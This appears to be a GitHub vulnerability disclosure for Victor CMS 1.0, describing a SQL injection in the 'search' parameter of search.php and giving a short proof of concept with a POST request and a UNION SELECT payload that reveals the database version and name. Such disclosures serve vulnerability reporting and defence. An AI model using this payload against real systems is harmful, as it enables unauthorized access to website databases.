Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Victor CMS 1.0 - 'Search' SQL Injection

  • Vulnerability Type :
    SQL Injection

  • Vulnerability Version :
    v 1.0

  • Recurring environment:
    XAMPP / Windows 10

  • Discription:
    The Victor CMS v1.0 application is vulnerable to SQL injection via the 'search' parameter on the search.php page.

  • Feature: Search

  • Vulnerable file: search.php
    image

  • Vulnerable parameter : - search

*POC:
url: http://example.com/CMSsite/search.php
Methode : Post (search="[SQLi]"&submit)
Payload : 1337'union+select+1,2,version(),database(),5,6,7,8,9,10 -- -